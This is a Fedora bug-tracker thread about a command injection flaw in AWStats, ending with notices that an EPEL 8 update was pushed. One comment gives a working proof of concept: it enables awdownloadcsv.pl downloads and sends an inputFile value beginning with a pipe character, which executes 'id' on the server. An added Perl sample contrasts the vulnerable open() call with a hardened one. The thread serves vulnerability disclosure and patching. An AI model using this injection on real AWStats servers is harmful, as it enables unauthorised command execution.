Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
I understand that AWStats is no longer being actively maintained and is slated for removal from future Fedora packages. However, given the impact of the recent vulnerability (CVE-2025-63261), could you please consider addressing this issue?

It appears that a patch has been proposed in the following issue: https://github.com/eldy/AWStats/issues/287

Could you please review this and let me know if it's possible to apply the fix? Thank you for your time and effort.
I would like to provide additional information regarding this ticket.

While investigating the issue in awstats.pl, I found that a similar command injection vulnerability also exists in awdownloadcsv.pl when the $ALLOWDOWNLOAD configuration is enabled. This finding is consistent with the vulnerability report discussed on the OSS-security mailing list: https://www.openwall.com/lists/oss-security/2026/03/08/8

Vulnerability Detail:
In awdownloadcsv.pl, the inputFile parameter is not properly sanitized before being used in an open() call (or similar file-handling functions), allowing for arbitrary command execution via the pipe character (|).

1. Prepare the environment and install packages
---
crb enable
dnf install -y https://dl.fedoraproject.org/pub/epel/epel-release-latest-9.noarch.rpm
dnf install -y awstats httpd
systemctl start httpd
---

2. Enable the download feature in the script
---
sed -i 's/my $ALLOWDOWNLOAD=0;/my $ALLOWDOWNLOAD=1;/' /usr/share/awstats/wwwroot/cgi-bin/awdownloadcsv.pl
---

3. Execute command
---
curl "http://localhost/awstats/awdownloadcsv.pl?inputFile=%7Cid"
---

Result:
The command "id" is executed, and the output is returned in the response.

Output:
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:awstats_script_t:s0
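The root cause described in the comment above is Perl's two-argument open(): when the whole string comes from a request parameter, a leading "|" turns the open into a pipe from a shell command. The following is an added illustration, not code from AWStats or from this ticket; the report directory, the candidate file names and the sanitizer are assumptions made for the example. It shows the vulnerable pattern (defined but never called) next to a hardened version that allowlists the name and uses three-argument open() with an explicit read mode, so the name is never interpreted.

```perl
#!/usr/bin/perl
# Added illustration (not AWStats code): two-argument open() on a CGI
# parameter as a command injection sink, and a hardened replacement.
use strict;
use warnings;
use File::Spec;

my $REPORT_DIR = '/var/lib/awstats';   # hypothetical report directory

# VULNERABLE pattern, shown only, never called below.
# With two arguments, open() parses EXPR itself: a leading '|' means
# "run the rest as a shell command and read its output", so the
# constructed value '|id' from ?inputFile=%7Cid executes id.
sub open_report_unsafe {
    my ($name) = @_;
    open(my $fh, $name) or return;     # '|id' -> pipe from the shell
    return $fh;
}

# HARDENED: allowlist the name, build the path ourselves, and use the
# three-argument form with mode '<' so the third argument is always a
# literal file name, never a mode or a pipe.
sub open_report_safe {
    my ($name) = @_;
    return (undef, 'rejected: bad inputFile')
        unless defined $name
            && $name =~ /\A[A-Za-z0-9_.-]+\z/   # no '/', '|', spaces, etc.
            && $name !~ /\A\.+\z/;              # no '.' or '..'
    my $path = File::Spec->catfile($REPORT_DIR, $name);
    open(my $fh, '<', $path) or return (undef, "open failed: $!");
    return ($fh, "ok: $path");
}

# Constructed request values: the injection string from the report, a
# traversal attempt, and a plausible legitimate CSV name.
for my $candidate ('|id', '../../etc/passwd', 'awstats.example.com.csv') {
    my ($fh, $status) = open_report_safe($candidate);
    printf "%-26s -> %s\n", $candidate, $status;
    close $fh if $fh;
}
```

Running the script under `perl -T` (taint mode) is a further mitigation for CGI code of this kind: a tainted value passed to a pipe open dies before anything is executed.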
FEDORA-EPEL-2026-3bef016061 (awstats-8.0-1.el8) has been submitted as an update to Fedora EPEL 8. https://bodhi.fedoraproject.org/updates/FEDORA-EPEL-2026-3bef016061
FEDORA-EPEL-2026-3bef016061 has been pushed to the Fedora EPEL 8 testing repository. You can provide feedback for this update here: https://bodhi.fedoraproject.org/updates/FEDORA-EPEL-2026-3bef016061 See also https://fedoraproject.org/wiki/QA:Updates_Testing for more information on how to test updates.
FEDORA-EPEL-2026-3bef016061 (awstats-8.0-1.el8) has been pushed to the Fedora EPEL 8 stable repository. If problem still persists, please make note of it in this bug report.